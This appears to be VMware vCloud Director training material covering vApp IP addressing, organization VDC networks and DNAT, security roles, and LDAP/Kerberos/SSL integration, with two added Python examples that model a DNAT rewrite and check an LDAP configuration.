[Figure: two vApps attached to the same organization VDC network (192.168.11.0/24), which has its own DHCP / static pool and reaches the outside through an Edge Gateway.]

• Routed vApp: the vApp network (192.168.210.x addresses, with its own DHCP / static pool) sits behind a vShield Edge that connects it to the organization VDC network. Its virtual machines use 192.168.210.2 (Static), 192.168.210.204 (Manual), and 192.168.210.103 (DHCP).
• Direct-connect vApp: the virtual machines sit directly on the organization VDC network and use 192.168.11.2 (Static), 192.168.11.204 (Manual), and 192.168.11.103 (DHCP).


vCloud Director uses guest customization when it deploys virtual machines inside vApps to control IP addressing. Three types of IP addressing exist: static, manual, and DHCP.

DHCP addressing is standard DHCP. The virtual machine's guest operating system must itself be configured to obtain a DHCP address; vCloud Director does not use guest customization to configure the virtual machine as a DHCP client. If a virtual machine is set to use DHCP, you must either have the VMware® vShield™ device on the network configured to provide DHCP services or directly attach the vApp network to a higher-level network that has an external DHCP server.

If a virtual machine has been assigned a DHCP address, you cannot configure an external network address translation (NAT) IP address for it on the organization VDC network.

Static addressing is similar in operation to DHCP. When you create the network, you set a static range of IP addresses. vCloud Director pulls IP addresses out of the static range in sequential order and then uses guest customization to set the selected address in the virtual machine.

Static addresses have a major advantage over DHCP. If you set a virtual machine to a static IP address, vCloud Director automatically assigns it an external NAT IP address on the organization VDC network that the vApp is attached to. This automatic assignment of external NAT IP addresses greatly simplifies NAT operations.

Manual IP addressing means that vCloud Director uses the address that the administrator explicitly specifies for a virtual machine, again using guest customization to configure the address in the guest. A virtual machine with a manual IP address does not automatically receive an external NAT IP address on the organization VDC network, but the vCloud Director administrator can set the external NAT IP address for such a virtual machine manually.


Review of Learner Objectives (Slide 5-64)

You should be able to meet the following objectives:
• Copy a vApp from a public catalog to the local organization catalog
• Deploy a vApp from the local organization catalog
• Configure and start vApps


Lesson 6: Additional Organization VDC Networking (Slide 5-65)


Learner Objectives (Slide 5-66)

By the end of this lesson, you should be able to meet the following objectives:
• Create a direct-connect organization VDC network
• Create a routed organization VDC network
• Create a suballocated IP pool for an organization VDC network
• Create a fenced vApp
• Create a destination network address translation (DNAT) mapping


Direct-Connect Organization VDC Networks: Review (Slide 5-67)

• A system administrator must create a direct-connect network on behalf of an organization.
• A direct-connect organization VDC network is an extension of an external network and does not connect to the organization VDC edge gateway.
• Organization administrators cannot create, configure, or manage a direct-connect network.
• Network services for a direct-connect network are provided by the external network created and managed by the system administrators:
  - Including IP address services, DNS configuration, and subnet range
• All direct-connect networks connected to an external network share the same layer 2 broadcast domain. Exercise care when using direct-connect organization VDC networks.
• Use fencing to isolate MAC and IP addresses.


Direct-Connect Organization VDC Network: Example (Slide 5-68)

[Figure: an External Public network (172.20.11.0/24) with the RD Gateway at 172.20.11.201. Behind the gateway, the routed organization VDC network RD External (172.30.1.0/24) carries two NAT-routed vApps, RD-vApp1 (172.30.110.0/24) and RD-vApp2 (172.30.120.0/24). A second, direct-connect organization VDC network, RD Services Network (172.20.10.0/24), carries the fenced vApp RD-Services.]

A system administrator can create a direct-connect organization VDC network on behalf of an organization. A direct-connect organization VDC network is a literal extension of an external network and cannot be managed by anyone other than a system administrator. A direct-connect organization VDC network does not connect to the organization edge gateway.

A direct-connect organization VDC network shares the same layer 2 broadcast domain as the external network it connects to, so use it with care. Although an organization administrator cannot manage the network directly, the organization administrator can direct-connect a vApp to it, which exposes the vApp's virtual machines to the external network's broadcast domain and consumes external network resources (addresses, for example). Direct-connect vApps should therefore be fenced, so that the MAC and IP addresses of the contained virtual machines are isolated from the broadcast domain and cannot conflict with it.


Suballocated IP Pools and DNAT: Review (Slide 5-70)

• External IP addresses can be mapped to internal hosts across an organization VDC edge gateway.
• The external address or range must be suballocated on the external network by a system administrator.
• After a suballocated IP pool has been created, the organization administrator can use those IP addresses for NAT purposes.
• DNAT is a method by which an organization gateway transforms the destination address of packets:
  - The edge gateway receives packets for the external IP of the DNAT mapping by associating its external interface MAC address with that IP address through an Address Resolution Protocol response.
  - The edge gateway modifies the IP headers so that the packets are targeted to an address on an interior network.
  - The edge gateway forwards those packets to the target host or to the next hop.
• Protocol filtering can be applied.

As the system administrator, you can configure suballocation IP pools when the organization VDC is created, or later. If an organization must host externally accessible services by using a destination network address translation (DNAT) mapping through the edge gateway firewall, the system administrator must suballocate one or more IP addresses for the organization to use in its NAT mappings.

To host inbound connections, an organization administrator can create DNAT rules that map external IP addresses or address ranges to internal addresses. Allocation of external addresses must be explicitly configured by a system administrator; once a suballocation IP pool exists, the organization administrator can create whatever mappings are necessary within it.

When DNAT rules are defined, the edge gateway issues Address Resolution Protocol (ARP) responses on its external interface for each mapped destination address, so all packets destined for any DNAT-defined external address are delivered to the edge gateway. On receiving a packet whose destination address matches a DNAT rule, the edge gateway rewrites the destination address according to the rule, updates the IP header checksum, and forwards the packet to the interior host or the next interior hop. The TCP and UDP checksums also cover the IP addresses through the pseudo-header, so a NAT device must update those checksums as well.
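The edge gateway behaviour described above, as an added example that is not vShield Edge or course code: a small model that only accepts DNAT rules whose external address the system administrator has suballocated, answers ARP for those addresses, filters by protocol and port, rewrites the destination IP and port, and recomputes both the IP header checksum and the TCP/UDP checksum. The addresses (the 172.20.11.201 gateway address from the slide, an interior host, and an outside client) and the packet are constructed for the example; the rule table and class names are the example's own.

```python
"""Model of a DNAT rewrite as performed by an edge gateway.

Added example, not vShield Edge or course code. Rule table, class names,
addresses and the sample packet are constructed for illustration.
"""
import ipaddress
import struct
from dataclasses import dataclass
from typing import Optional

PROTO_TCP = 6
PROTO_UDP = 17


def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 16-bit one's-complement sum with end-around carry."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def checksum(data: bytes) -> int:
    return (~ones_complement_sum(data)) & 0xFFFF


def transport_checksum(src: bytes, dst: bytes, proto: int, segment: bytes) -> int:
    """TCP and UDP checksums cover a pseudo-header holding both IP addresses,
    so changing the destination IP invalidates them as well."""
    pseudo = src + dst + struct.pack("!BBH", 0, proto, len(segment))
    return checksum(pseudo + segment)


def build_tcp_packet(src_ip: str, dst_ip: str, sport: int, dport: int, payload: bytes = b"") -> bytes:
    """Constructed input: a minimal IPv4/TCP SYN with correct checksums."""
    src, dst = ipaddress.IPv4Address(src_ip).packed, ipaddress.IPv4Address(dst_ip).packed
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, 0x02, 65535, 0, 0) + payload
    tcp = tcp[:16] + struct.pack("!H", transport_checksum(src, dst, PROTO_TCP, tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0x4000, 64, PROTO_TCP, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp


def verify_packet(packet: bytes) -> bool:
    """True if both the IP header checksum and the TCP/UDP checksum verify."""
    ihl = (packet[0] & 0x0F) * 4
    header, segment = packet[:ihl], packet[ihl:]
    if ones_complement_sum(header) != 0xFFFF:
        return False
    pseudo = header[12:16] + header[16:20] + struct.pack("!BBH", 0, header[9], len(segment))
    return ones_complement_sum(pseudo + segment) == 0xFFFF


@dataclass(frozen=True)
class DnatRule:
    external_ip: str
    proto: int
    external_port: int
    internal_ip: str
    internal_port: int


class EdgeGateway:
    def __init__(self, suballocated_ips: set, rules: list):
        # The organization administrator may only map addresses that the
        # system administrator suballocated to this organization VDC.
        for rule in rules:
            if rule.external_ip not in suballocated_ips:
                raise ValueError(f"{rule.external_ip} is not in the suballocated pool")
        self.rules = {(r.external_ip, r.proto, r.external_port): r for r in rules}

    def answers_arp_for(self, ip: str) -> bool:
        """The gateway claims every DNAT external address on its uplink."""
        return any(r.external_ip == ip for r in self.rules.values())

    def translate(self, packet: bytes) -> Optional[bytes]:
        """Return the rewritten packet, or None if it is filtered or unmatched."""
        ihl = (packet[0] & 0x0F) * 4
        header, segment = packet[:ihl], packet[ihl:]
        if ones_complement_sum(header) != 0xFFFF:
            return None                                   # corrupt header: drop
        proto, src, dst = header[9], header[12:16], header[16:20]
        min_len, cksum_off = {PROTO_TCP: (20, 16), PROTO_UDP: (8, 6)}.get(proto, (None, None))
        if min_len is None or len(segment) < min_len:
            return None                                   # protocol filtering
        dport = struct.unpack("!H", segment[2:4])[0]
        rule = self.rules.get((str(ipaddress.IPv4Address(dst)), proto, dport))
        if rule is None:
            return None                                   # no mapping: drop
        new_dst = ipaddress.IPv4Address(rule.internal_ip).packed
        new_header = header[:10] + b"\x00\x00" + header[12:16] + new_dst + header[20:]
        new_header = new_header[:10] + struct.pack("!H", checksum(new_header)) + new_header[12:]
        seg = (segment[:2] + struct.pack("!H", rule.internal_port)
               + segment[4:cksum_off] + b"\x00\x00" + segment[cksum_off + 2:])
        seg = seg[:cksum_off] + struct.pack("!H", transport_checksum(src, new_dst, proto, seg)) + seg[cksum_off + 2:]
        return new_header + seg
```

Note that the rule key includes the protocol and destination port, which is what "protocol filtering" amounts to in practice: a packet to the mapped address on an unmapped port or protocol is dropped rather than forwarded. The reverse direction (source NAT of the reply) is not modelled here.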


Lab 9: Hosting Inbound Services (Slide 5-72)

Configure vApps and networks for hosting inbound services.


Key Points (Slide 5-74)

• In VMware vCloud® infrastructures, IT services are delivered through organizations.
• Organizations provide secure, controlled, self-service environments for consumers to access IT services.
• Organizations might be connected to cloud-wide LDAP systems or have an organization-only LDAP system.
• Organizations must be created before you create organization VDCs and organization VDC networks.
• Catalogs are libraries that are normally restricted to a single organization but might be opened up to an entire cloud.
• A catalog provides organization users with a library of vApp templates and media that they can use to create vApps and install applications on virtual machines.
• vApps are based on vApp templates that are stored in the catalog.

Questions?


You Are Here (Slide 6-2)

• Course Introduction
• VMware vCloud Director Architecture and Components
• VMware vCloud Director Networking
• VMware vCloud Director Providers
• VMware vCloud Director Organizations
• VMware vCloud Director Basic Security
• Managing VMware vCloud Director Resources
• Managing VMware vSphere Resources
• Monitoring VMware vCloud Director Components
• VMware vCloud Director Organization Users
• VMware vCloud Director Installation


Importance (Slide 6-3)

VMware vCloud Director® is designed to be a secure environment. vCloud Director administrators must be able to use security roles and LDAP integration to keep VMware vCloud® secure.


Module 6 VMware vCloud Director Basic Security 233


Module Lessons (Slide 6-4)

• Lesson 1: Security Roles
• Lesson 2: LDAP Integration


Lesson 1: Security Roles (Slide 6-5)


Learner Objectives (Slide 6-6)

By the end of this lesson, you should be able to meet the following objective:
• Create and manage security roles in vCloud Director


vCloud Director Security (Slide 6-7)

vCloud Director security identifies users from five possible locations:
• vCloud Director local
• vCloud Director imported from LDAP
• Organization local
• Organization imported from LDAP
• VMware vSphere® identity provider

[Figure: an LDAP server supplies imported users to vCloud Director, where they sit alongside local users as system administrators; a second LDAP server supplies imported users to an organization, alongside the organization's local users; vSphere users come from the VMware vSphere identity provider.]

The VMware® vCloud Director® security architecture identifies users from five possible locations:

• Locally defined in vCloud Director
• Imported from a Lightweight Directory Access Protocol (LDAP) server into vCloud Director
• Locally defined within each organization
• Imported from an LDAP server into a specific organization
• Imported from the VMware vSphere® identity provider

All users defined at the system level are system administrators. System administrators have full rights in all organizations in the cloud.

vCloud Director Security Roles and Rights (Slide 6-8)

• Rights determine which actions a user can perform.
• Roles are a collection of rights.
• Roles (other than system administrator) exist only at the organization level.
• Each user or group must be assigned to a role.
• The same user can have different roles in different organizations.
• Users can be assigned roles by belonging to a group.
• Groups must be imported from external directory services, such as LDAP.
• End users of cloud services do not require a user ID or security rights in vCloud Director.
• End-user access should be controlled by application software in a vApp.

vCloud Director uses roles and rights to determine what actions a user can perform in an organization. vCloud Director includes a number of predefined roles with specific rights. System administrators and organization administrators must assign each user or group a role. The same user can have a different role in different organizations. System administrators can also create roles and modify existing ones.


Predefined vCloud Director Security Roles (Slide 6-9)

vCloud Director includes predefined roles:
• System Administrator
• Organization Administrator
• Catalog Author
• vApp Author
• vApp User
• Console Access Only

The six predefined roles in vCloud Director are System Administrator, Organization Administrator, Catalog Author, vApp Author, vApp User, and Console Access Only. All roles can be modified by system administrators except for the System Administrator role. System administrators can also create new custom roles.

Console Access Only Role (Slide 6-10)

Extremely limited role:
• Can view and use the console of a virtual machine in a vApp
• Can manage virtual machine password settings from inside the guest operating system (no access to vCloud Director guest customization of virtual machines)
• Assign to end users who might be system administrators of the virtual machines within a VMware vSphere® vApp but who have no administration duties related to vCloud.

Excellent for the following:
• Windows administrators
• Linux root administrators
• Application administrators and developers, such as Web site administrators, database administrators, and email administrators

The Console Access Only role is an extremely limited role. It should be assigned only to end users who have some kind of system administration responsibility on the virtual machines within a specific VMware vSphere® vApp™. The Console Access Only role should not be assigned to individuals who have cloud-related administration responsibilities.

The major difference between the Console Access Only role and the vApp User role is that Console Access Only users cannot act at the vSphere level of the architecture: they cannot, for example, modify the properties of a virtual machine or copy a virtual machine.


vApp Users (Slide 6-11)

The vApp User role is useful for virtual machine system administrators. vApp users can do the following:
• Delete (but not create) a vApp
• Edit vApp properties
• Operate a vApp: start, stop, suspend, and reset
• Access a virtual machine console
• Share a vApp
• Copy and move a vApp
• Edit virtual machine properties (does not include resource items such as CPU, memory, network, or disk)
• Manage virtual machine password settings

The vApp User role is designed to allow someone to use a vApp. It includes the ability to change (non-resource) properties, to access the console, to share a vApp, to copy or move a vApp, and to manage the passwords of virtual machines within the vApp. A vApp User can delete a vApp but cannot create one.

The vApp User role is intended mainly for individuals who are system administrators of the virtual machines that make up a vApp. An end user or customer does not need the vApp User role to use a vApp over a network connection.

Examples:

• If your vApp is a Web application designed to let customers place orders, those customers do not need the vApp User role to place an order on the Web site.
• If your vApp is a Web application designed to let help desk personnel enter and update trouble tickets, those users do not need the vApp User role to enter or manage tickets.
• An individual who is the system administrator of the Web application (the root user) might need the vApp User role to manage their systems in the vApp.

vApp Authors (Slide 6-12)

• vApp authors can create and manage vApps.
• They can modify the following on a virtual machine:
  - Memory
  - CPU
  - Disks
  - Passwords
• They can create and modify vApp networks.
• They can view and add vApps from organization catalogs.
• The vApp Author role includes all of the rights of the vApp User role.

The vApp Author role is more limited than most other roles. It basically gives a user the ability to create and manage vApps. The vApp Author role includes the ability to modify settings on virtual machines within their vApps. This role can also create vApps from catalogs.

Organization Administrators (Slide 6-14)

Organization administrators can do the following:
• Add or manage organization users
• Create or manage catalogs
• Edit organization properties
• Edit organization SMTP settings
• Send email notifications
• View and edit organization networks
• Create new routed and isolated organization networks
• Edit quota and lease policies

A vCloud Director system administrator has the Organization Administrator role by default in all organizations.

The organization administrator has broad powers within an existing organization. The organization administrator role does not have the ability to add resources from the underlying vSphere infrastructure to the cloud. But after organization VDCs and organization networks have been created for an organization by the system administrator of VMware vCloud®, the organization administrator can manage them.

All system administrators of vCloud have the organization administrator role in all organizations. It is not possible for an organization administrator to modify a system administrator's rights within their organization.

Organization Administrators and Networks (Slide 6-15)

• Organization administrators do have the right to create organization VDC networks.
• Organization networks that can be created by organization administrators are limited to routed and isolated organization networks.
• Organization administrators do not have the ability to create direct-connected organization networks.
  - In vCloud Director 1.5, organization administrators cannot create any kind of organization network.
• Organization administrators can change the properties on organization VDC networks.
• Organization administrators cannot create edge gateways.
• Organization administrators can modify some of the properties and configuration of an edge gateway.
• Organization administrators cannot create or modify external networks.

The organization administrator role has a special relationship to organization virtual data center (VDC) networks. In contrast to vCloud Director 1.5, organization administrators can now create organization networks. However, these organization networks are limited to routed and isolated networks. Only system administrators can create direct-connected organization networks.

Another change between vCloud Director 1.5 and vCloud Director 5.1 is the edge gateway. Organization administrators cannot create edge gateways. But they can modify some of their properties and configuration.

System Administrator Role (Slide 6-16)

• All users defined at the vCloud Director system level are system administrators.
• Other roles can only be assigned to users at the organization level.
• If a user is going to be assigned a role other than system administrator, the user ID should not be created at the system level.
• You can create individual users or import groups of users at the system level.
• System Administrator is the only type of user account with cloud-wide rights in vCloud Director.
• System administrators create and manage everything in the cloud.
• Only system administrators can create and modify roles.

The vCloud Director System Administrator role is the “root” or “Administrator” account for the entire cloud. The only users who exist outside of the organizations are system administrators. All system administrators within vCloud Director have full rights to all organizations. Individuals who operate in the vCloud Director System Administrator role are often the same as VMware® vCenter Server™ administrators.

All users who are defined at the vCloud Director system level are system administrators. These include users created in vCloud Director and users imported from external LDAP systems into vCloud Director. If a user must have less than System Administrator rights, the user should be created at the organization level. It is possible to have the same user imported into different organizations from one LDAP system. That user can then be assigned different rights in each organization if desired.

Users do not have to be imported from LDAP or created at the organization level. You can create users or import users from LDAP at the system level. It is also possible to import groups of users from external LDAP servers at the system level.

Custom Roles (Slide 6-17)

System administrators can create new roles as follows:
• Create a role from the beginning by manually selecting the desired rights
• Copy a role to a new role and modify the rights

• System administrators can also modify a role.
• Some rights that can be assigned to custom roles might have limited functionality.

Best practices:
• Do not modify or delete the standard roles.
• Copy a role to a new role.
• Modify the rights as desired.
• Assign the new role to users.

System administrators can create custom roles by either creating a role from the beginning or by copying and modifying an existing role. System administrators also can delete roles. The best practice is not to delete or modify the standard roles. Instead, either create a role from the beginning or copy an existing role and modify it.

Switching Between Roles (Slide 6-18)

• A single individual might have access to multiple user IDs with different roles.
  - Example: A system administrator who needs to test an organization administrator account
• Web browsers have the ability to use tabs to open multiple sessions in the same browser.
• To switch between user IDs with different roles, users should use the following procedure:
  1. Click Log Out in the upper-right corner of the browser window.
  2. Close the tab.
  3. Open a new tab with the correct URL to the desired vCloud Director console.
  4. Log in under the new user ID that has a different security role in the new tab.

If an individual must switch between two different roles in vCloud Director, that individual must carefully manage the browser tabs that give them access to the vCloud Director console. Use the procedure outlined here to switch between vCloud Director security roles.

Lab 10: Managing Custom Security Roles (Slide 6-19)

Manage a custom VMware Cloud Director security role

Review of Learner Objectives (Slide 6-20)

You should be able to meet the following objective:
• Create and manage security roles in vCloud Director

Lesson 2: LDAP Integration (Slide 6-21)

Learner Objectives (Slide 6-22)

By the end of this lesson, you should be able to meet the following objectives:
• Create custom vCloud Director security roles
• Integrate LDAP servers with vCloud Director

LDAP Integration (Slide 6-23)

• vCloud Director supports two types of LDAP integration:
  - Active Directory (Windows)
  - OpenLDAP (Linux)
• Authentication methods:
  - Simple with optional SSL
  - Kerberos with optional SSL
• Only the system administrator can configure LDAP settings.
• Each organization can have a separate LDAP configuration.
• Users and groups must be manually imported into vCloud Director.
• If you are using VMware® vCenter Single Sign-On, you can identify your LDAP server as an identity provider.
  - Users are treated like users imported from LDAP.

You can use an LDAP service to provide a directory of users and groups to import into an organization. If you do not specify an LDAP service, you must create a user account for each user in the organization. LDAP options can only be set by a system administrator and cannot be modified by an organization administrator.

Multiple methods of authentication are supported, depending on which type of LDAP server you have connected to.

Each organization can have its own LDAP configuration. Users and groups must be imported into the organization and assigned roles before they can be used. It is possible to modify how often vCloud Director will connect to the LDAP server to synchronize accounts.

vCloud Director 5.1 has the capability to import users from VMware® vCenter™ Single Sign-On™. These users are treated in a manner similar to users imported from LDAP sources. Users can be imported from any system configured in vCenter Single Sign-On as an identity provider.

The use of vCenter Single Sign-On and other vCloud Director security integration features such as Security Assertion Markup Language (SAML) are covered in more detail in the advanced vCloud Director courses.

LDAP Integration Benefits (Slide 6-24)

• LDAP systems can define and manage a large number of user properties external to vCloud Director:
  - User ID and password
  - Email address
  - Group membership
  - Contact information
• An external LDAP system enables a single location to be shared between other systems and vCloud Director to manage user security (single sign-on).
• vCloud Director checks users who were imported from LDAP at login to ensure that credentials are correct.

vCloud Director provides for single sign-on capability. A single sign-on capability enables a user to have a single user ID and password that works throughout the system. vCloud Director provides single sign-on by integrating LDAP. vCloud Director imports user IDs from external LDAP systems. vCloud Director can also import other key information such as email addresses, group membership, and contact information.

vCloud Director does not import user passwords from external LDAP systems. Instead, vCloud Director confirms that a password is correct when a user logs in by checking the supplied password hash against the password hash currently stored in the LDAP directory.

In this discussion, the term “single sign-on” should be considered a generic security term.

LDAP Synchronization (Slide 6-25)

• vCloud Director does not support hierarchical domains in LDAP.
• LDAP users cannot log in to vCloud Director until their user ID has been imported.
  - The vCloud Director user account is not created until first login.
• vCloud Director does not support recursive OU import.
  - Users and groups are pulled from the target OU only.
• vCloud Director cannot modify the information in an LDAP directory.
• You must configure the frequency of synchronization of vCloud Director user and group information with LDAP.

vCloud Director does not automatically import users and groups from LDAP systems. Instead, you must manually select which users and groups to import. vCloud Director checks the users' credentials for all imported users at login time. It is not possible for a user in an external LDAP directory to log in to vCloud Director unless their user ID has been imported by vCloud Director.

vCloud Director does not support hierarchical domains in LDAP.

vCloud Director cannot modify the information in an LDAP directory.

vCloud Director will synchronize imported user data such as group membership, e-mail address, and contact information. The period of synchronization must be configured by either the system administrator (for vCloud Director system-wide user accounts) or the organization administrator (for custom LDAP configurations at the organization level).

LDAP Network (Slide 6-26)

• Each organization can query an organization-specific LDAP server.
• Organizations can share a custom LDAP server.
• A single LDAP server can serve the entire cloud.
• Organizations require individual LDAP OU definitions.

Figure (slide diagram): vCenter Server system, vCloud Director, database server, vShield Manager, vCloud LDAP server, organization Alpha LDAP server, organization Beta LDAP server.

vCloud Director can use LDAP at both the system level and the organization level. At the system level you can either connect to an external LDAP system or you can create and use users who are internal to vCloud Director. Even if you use an external LDAP system, VMware® recommends that you create at least one system user that is internal-only. The existence of at least one internally defined system administrator allows you to log in to your vCloud Director console even if the LDAP system is offline.

Kerberos Integration (Slide 6-28)

• vCloud Director can use Kerberos or Kerberos plus SSL to authenticate to Active Directory LDAP servers.
• You must add a Kerberos realm to use Kerberos authentication:
  - Realm names are all uppercase unless Allow lower-case realms has been selected in the LDAP configuration panel.
  - For Active Directory, the realm is the domain name in uppercase. Example: ENGINEERING.ACME.COM
  - The KDC is the domain controller. Example: DC1.ENGINEERING.ACME.COM
• Connecting to LDAP and adding Kerberos realms requires DNS name resolution to the Key Distribution Center (KDC).
• The vCloud Director server must be able to access the LDAP servers and the KDCs.
• To use Kerberos, you must use only the fully qualified domain name when you configure the host name or IP of the LDAP server in vCloud Director.

If you are using Kerberos authentication, you must add a Kerberos realm to the vCloud Director server first. To use an LDAP server, the vCloud Director server must be able to connect to it over the network. This connection requires a proper DNS configuration. Some LDAP systems use a Key Distribution Center that is a separate server from the LDAP server. If you are using Kerberos authentication, the vCloud Director server must be able to connect to the KDC if it is separate from the LDAP server.

It is possible to serve the entire vCloud with a single LDAP server. Or individual organizations can have their own LDAP servers.

vCloud Director can use either Kerberos or Kerberos + SSL to authenticate to LDAP servers if the LDAP server is either a Windows 2003 or a Windows 7 domain controller.

Kerberos is not supported when vCloud Director authenticates to Linux OpenLDAP servers. However, to increase security it is possible to use SSL when authenticating to Linux OpenLDAP servers.

Before vCloud Director can use Kerberos, you must configure the Kerberos realm in vCloud Director.

Windows Active Directory is an LDAP directory that also uses a modified implementation of Kerberos. If you are trying to connect to a Windows LDAP, then the realm name is the same thing as the Windows domain name in upper case.

To use Kerberos to log in to a Windows LDAP, the Key Distribution Center (KDC) is the domain controller. You can use any domain controller in the domain as the KDC.

Kerberos is one of the most secure and reliable systems ever created for secure authentication. But it can have problems. Most problems with Kerberos authentication can be traced to one of two issues:

• DNS issues. If there are minor differences in DNS in the way a node name is stored, it can prevent Kerberos authentication. These differences might not cause problems for other types of network connections. Kerberos requires the DNS name to be exactly what you are trying to authenticate to in Kerberos. The same name must be used in the Kerberos tickets. The best practice is to use the FQDN in all places.

• Lack of time synchronization. Kerberos tickets are time stamped to prevent an intruder from stealing and reusing tickets. The standard limit for time drift is 5 minutes. If a difference of more than 5 minutes occurs between the time of the client trying to connect (in this case, the vCloud Director server) and the Kerberos KDC, the ticket is considered invalid. Prevent time synchronization problems by synchronizing the vCloud Director server and the Kerberos KDC to the same time source. Using NTP servers on all systems solves this problem.

SSL Integration (Slide 6-30)

• Select Use SSL to use LDAP over SSL (LDAPS).
• For LDAPS, the default TCP port is 636, not 389.
• You can either accept all certificates or browse to a specific certificate.
• To use a specific SSL certificate, you must also have access to the SSL keystore and you must configure the keystore password.

To use SSL, you must select it. You must then determine if you will automatically accept all certificates or if you will insist on browsing to a specific certificate. Accepting all certificates is much easier to configure. If your LDAP server has a certificate, it is accepted automatically. The use of SSL also provides an encrypted password exchange with the LDAP server.

If you require a specific SSL certificate, the certificate will increase security. But the certificate from the LDAP server must be located on your system (the one the vCloud Director browser console is running from) and you must know the location of your SSL keystore file and have the password.
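The rules from slides 6-23, 6-28 and 6-30 (Simple or Kerberos bind with optional SSL, Kerberos only against Active Directory, uppercase realm, FQDN rather than IP for the LDAP host and KDC, LDAPS on 636, a pinned certificate needing the keystore and its password, and the 5-minute clock-skew limit) can be turned into a pre-flight check that runs before you touch the vCloud Director LDAP panel. This is an added example, not VMware code; the LdapConfig record, its field names and the ERROR/WARN wording are assumptions made for the example, and the DNS lookup only runs when resolve_dns=True is passed.

```python
"""Pre-flight checks for a vCloud Director LDAP / Kerberos / SSL configuration.
Added example, not VMware code. LdapConfig and the rule set are assumptions
modelled on the course slides; nothing here talks to a directory server.
"""
from dataclasses import dataclass
import re
import socket
from typing import List

# Dotted host name with at least two labels (constructed for this example).
FQDN_RE = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)(\.(?!-)[a-z0-9-]{1,63}(?<!-))+$", re.I)
MAX_KERBEROS_SKEW_SECONDS = 300  # the 5-minute drift limit described on the slide


@dataclass
class LdapConfig:                  # hypothetical record mirroring the LDAP panel fields
    server_type: str               # "ad" (Active Directory) or "openldap"
    host: str                      # host name or IP as typed into vCloud Director
    port: int
    auth_method: str               # "simple" or "kerberos"
    use_ssl: bool = False
    accept_all_certs: bool = True  # easier to configure, but weaker than a pinned certificate
    keystore_path: str = ""
    keystore_password: str = ""
    realm: str = ""                # Kerberos realm, e.g. ENGINEERING.ACME.COM
    allow_lowercase_realms: bool = False
    kdc: str = ""                  # domain controller acting as KDC


def is_fqdn(name: str) -> bool:
    """True for a dotted host name; an IPv4 literal is rejected."""
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", name):
        return False
    return FQDN_RE.match(name) is not None


def ad_realm(domain: str) -> str:
    """For Active Directory the realm is the domain name in uppercase."""
    return domain.upper()


def in_realm(host: str, realm: str) -> bool:
    """dc1.engineering.acme.com lies inside realm ENGINEERING.ACME.COM."""
    h, r = host.upper(), realm.upper()
    return h == r or h.endswith("." + r)


def dns_resolves(name: str) -> bool:
    try:
        socket.gethostbyname(name)
        return True
    except OSError:
        return False


def clock_skew_ok(client_epoch: float, kdc_epoch: float,
                  max_skew: float = MAX_KERBEROS_SKEW_SECONDS) -> bool:
    """A ticket is rejected when the client and KDC clocks differ by more than 5 minutes."""
    return abs(client_epoch - kdc_epoch) <= max_skew


def check_config(cfg: LdapConfig, resolve_dns: bool = False) -> List[str]:
    """Return findings: ERROR = will not work, WARN = works but is weaker or unusual."""
    findings: List[str] = []
    if cfg.server_type not in ("ad", "openldap"):
        findings.append(f"ERROR: unknown server type {cfg.server_type!r}")
    if cfg.auth_method not in ("simple", "kerberos"):
        findings.append(f"ERROR: unknown authentication method {cfg.auth_method!r}")

    # SSL / LDAPS rules (slide 6-30)
    expected_port = 636 if cfg.use_ssl else 389
    if cfg.port != expected_port:
        findings.append(f"WARN: port {cfg.port} is not the default {expected_port} for "
                        f"{'LDAPS' if cfg.use_ssl else 'LDAP'}; confirm with the LDAP administrator")
    if not cfg.use_ssl:
        findings.append("WARN: without SSL the password exchange with the LDAP server is not encrypted")
    elif cfg.accept_all_certs:
        findings.append("WARN: accepting all certificates; browse to a specific certificate for higher security")
    elif not (cfg.keystore_path and cfg.keystore_password):
        findings.append("ERROR: a specific certificate needs the SSL keystore location and keystore password")

    # Kerberos rules (slides 6-23 and 6-28)
    if cfg.auth_method == "kerberos":
        if cfg.server_type != "ad":
            findings.append("ERROR: Kerberos is supported only against Active Directory, not OpenLDAP")
        if not is_fqdn(cfg.host):
            findings.append("ERROR: Kerberos requires the LDAP server's fully qualified domain name, not an IP")
        if not cfg.realm:
            findings.append("ERROR: a Kerberos realm must be added before Kerberos authentication can be used")
        else:
            if cfg.realm != cfg.realm.upper() and not cfg.allow_lowercase_realms:
                findings.append("ERROR: realm must be uppercase unless 'Allow lower-case realms' is selected")
            if not in_realm(cfg.host, cfg.realm):
                findings.append(f"WARN: LDAP host {cfg.host} is not inside realm {cfg.realm}")
        if not cfg.kdc:
            findings.append("ERROR: no KDC (domain controller) configured")
        elif not is_fqdn(cfg.kdc):
            findings.append("ERROR: the KDC must be given as a fully qualified domain name")
        if resolve_dns:  # the DNS-resolution requirement; skipped unless asked for
            for name in (cfg.host, cfg.kdc):
                if name and is_fqdn(name) and not dns_resolves(name):
                    findings.append(f"ERROR: DNS cannot resolve {name}")
    return findings
```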

LDAP Terminology and Syntax (Slide 6-31)

• DN = distinguished name
• RDN = relative distinguished name
  - Think of the DN as the full file path and the RDN as a relative filename in its parent folder.
• CN = common name
• OU = organizational unit
• DC = domain component
• Sample syntax for two employees named Jane Smith who work for the same company and are in the same LDAP directory:
  - Jane Smith, in Sales, at the Newtech branch of Acme Company:
    dn: cn=Jane Smith, ou=Sales, dc=Newtech, dc=acme, dc=com
  - Jane Smith, in Engineering, at the Oldtech branch of Acme Company:
    dn: cn=Jane Smith, ou=Engineering, dc=Oldtech, dc=acme, dc=com

LDAP directories use unique terminology and syntax. This slide shows some of the common examples.

These LDAP schema attributes can be used to uniquely identify two different users with the same name in different parts of the directory. The Distinguished Name (DN) and Relative Distinguished Name (RDN) are both frequently used in LDAP systems. You will have to use the DN for LDAP queries in vCloud Director. You will also have to supply Domain Components (DC) as part of the connection string.

LDAP Namespace Diagram: Example (Slide 6-32)

Here is a graphical representation of two individuals with the same name in different locations within an LDAP directory.

